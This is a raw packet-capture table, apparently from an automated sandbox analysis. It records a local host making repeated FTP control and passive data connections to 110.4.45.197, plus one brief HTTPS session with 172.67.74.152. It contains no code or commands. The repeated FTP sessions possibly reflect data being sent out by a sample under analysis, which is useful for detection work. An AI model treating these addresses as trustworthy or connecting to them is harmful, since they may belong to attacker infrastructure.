                                            Nov 4, 2024 10:13:19.013953924 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:19.019087076 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:19.375341892 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:19.376250982 CET4972261813192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:19.381256104 CET6181349722110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:19.381321907 CET4972261813192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:19.381402969 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:19.386873007 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:20.357707024 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:20.357960939 CET4972261813192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:20.358042002 CET4972261813192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:20.363042116 CET6181349722110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:20.363521099 CET6181349722110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:20.363580942 CET4972261813192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:20.399741888 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:20.712255001 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:20.739705086 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:20.745652914 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:21.124290943 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:21.126398087 CET4972964015192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:21.139827013 CET6401549729110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:21.141788960 CET4972964015192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:21.141900063 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:21.148144960 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:22.771806955 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:22.771951914 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:22.771981955 CET2149716110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:22.772032976 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:22.773709059 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:23.210032940 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:23.210076094 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:23.210161924 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:23.214148045 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:23.214163065 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:23.823537111 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:23.823617935 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:23.829212904 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:23.829221964 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:23.829476118 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:23.884107113 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:23.891398907 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:23.935327053 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:24.063031912 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:24.063100100 CET44349739172.67.74.152192.168.2.5
                                            Nov 4, 2024 10:13:24.063577890 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:24.066504955 CET49739443192.168.2.5172.67.74.152
                                            Nov 4, 2024 10:13:24.347567081 CET4971621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:24.348931074 CET4972964015192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:24.610375881 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:24.615746975 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:24.616365910 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:25.844021082 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:25.844403028 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:25.844455957 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:25.844511986 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:25.849560976 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:26.184287071 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:26.185314894 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:26.190713882 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:26.556669950 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:26.560091019 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:26.565233946 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:26.900331974 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:26.900731087 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:26.905666113 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:27.240027905 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:27.242155075 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:27.247369051 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:27.580374956 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:27.581007957 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:27.586807966 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:27.918997049 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:27.919557095 CET4976664083192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:27.924659967 CET6408349766110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:27.924737930 CET4976664083192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:27.924803972 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:27.929692030 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:28.852077007 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:28.852401972 CET4976664083192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:28.852449894 CET4976664083192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:28.857403994 CET6408349766110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:28.863527060 CET6408349766110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:28.863601923 CET4976664083192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:28.899727106 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:29.205054045 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:29.240055084 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:29.244944096 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:29.577224016 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:29.577826023 CET4977456137192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:29.582608938 CET5613749774110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:29.582706928 CET4977456137192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:29.582776070 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:29.587974072 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:30.494503021 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:30.494716883 CET4977456137192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:30.494749069 CET4977456137192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:30.499708891 CET5613749774110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:30.500118971 CET5613749774110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:30.500176907 CET4977456137192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:30.540388107 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:30.842742920 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:30.843142986 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:30.847856045 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:31.181891918 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:31.182421923 CET4978365335192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:31.187278986 CET6533549783110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:31.187361956 CET4978365335192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:31.187427044 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:31.192203045 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:32.126950026 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:32.127156019 CET4978365335192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:32.132755995 CET6533549783110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:32.132810116 CET4978365335192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:32.181005001 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:32.476691008 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:32.477042913 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:32.481935978 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:32.816212893 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:32.816824913 CET4979458054192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:32.821764946 CET5805449794110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:32.821863890 CET4979458054192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:32.821898937 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:32.826891899 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:33.740529060 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:33.740865946 CET4979458054192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:33.746295929 CET5805449794110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:33.746376038 CET4979458054192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:33.790399075 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:13:34.090506077 CET2149745110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:13:34.134129047 CET4974521192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:32.624996901 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:32.689357996 CET4999621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:32.832688093 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:32.832704067 CET2149996110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:32.832782030 CET4999621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:32.833149910 CET4999621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:32.838279009 CET2149996110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:32.838323116 CET4999621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:33.182800055 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:33.183273077 CET4999763363192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:33.188101053 CET6336349997110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:33.188177109 CET4999763363192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:33.188241005 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:33.193021059 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:34.113265038 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:34.113452911 CET4999763363192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:34.113497019 CET4999763363192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:34.118223906 CET6336349997110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:34.118628979 CET6336349997110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:34.118676901 CET4999763363192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:34.165401936 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:34.464957952 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:34.509263992 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:35.123785973 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:35.128592014 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:35.485382080 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:35.485990047 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:35.490825891 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:35.490891933 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:35.490983963 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:35.495807886 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.384284019 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.392203093 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.397134066 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397157907 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397201061 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397211075 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397239923 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397249937 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397265911 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.397294998 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.397304058 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397313118 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397341967 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397344112 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.397351980 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.397352934 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.397372961 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.397387981 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.402324915 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.402335882 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.402350903 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.402367115 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.402395010 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.402404070 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.402412891 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.402581930 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.402647018 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.402834892 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.407490015 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.407752037 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.407958031 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.408020020 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.413096905 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.414086103 CET5629449998110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:36.414139986 CET4999856294192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:36.433866024 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:37.137233019 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:37.181088924 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:42.815064907 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:42.820048094 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:43.174119949 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:43.174683094 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:43.179574013 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:43.179646969 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:43.179708958 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:43.184674978 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.120671988 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.121968031 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.126964092 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127013922 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127023935 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127041101 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127047062 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.127051115 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127062082 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127079964 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.127082109 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127095938 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127111912 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127121925 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.127151012 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.127214909 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.131937981 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.131992102 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.132006884 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132055044 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132064104 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132078886 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132118940 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.132158995 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132169008 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132179022 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132193089 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.132241964 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.132263899 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132272959 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132281065 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132311106 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.132350922 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.136833906 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137108088 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137141943 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137196064 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137273073 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137283087 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137660027 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137669086 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137677908 CET4962849999110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:44.137855053 CET4999949628192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.165601015 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:44.955656052 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:45.009160042 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:53.779392958 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:53.784493923 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:54.134797096 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:54.136173964 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:54.141423941 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:54.141547918 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:54.141563892 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:54.146795988 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.062520981 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.062829018 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.067816019 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.067827940 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.067843914 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.067854881 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.067862988 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.067866087 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.067888021 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.067934036 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.068006039 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.068046093 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.068052053 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.068092108 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.068164110 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.068212032 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.068315983 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.068325996 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.068361044 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.072815895 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.072859049 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.072886944 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.072896004 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.072920084 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.072942972 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.072962999 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.073040009 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.073080063 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.073115110 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.073153019 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.073159933 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.073210955 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.073353052 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.073394060 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.073406935 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.073436975 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.073441029 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.073477983 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.073558092 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.078088999 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.078414917 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.078481913 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.078493118 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.079052925 CET5322750000110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.079088926 CET5000053227192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.196670055 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:55.841114998 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:55.901901960 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:57.222871065 CET5000121192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:57.227886915 CET2150001110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:57.227972984 CET5000121192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:57.230992079 CET5000121192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:57.235990047 CET2150001110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:57.236047029 CET5000121192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:57.506872892 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:57.511893988 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:57.868077993 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:57.876900911 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:57.881979942 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:57.882196903 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:57.882333040 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:57.887228012 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.959717035 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.959969044 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.964895010 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.964941978 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.964970112 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.964998007 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.965027094 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.965043068 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.965106964 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.965150118 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.965157032 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.965167046 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.965183020 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.965204954 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.965241909 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.965251923 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.965251923 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.965261936 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.965286016 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.965306997 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.969897985 CET5151250002110.4.45.197192.168.2.5
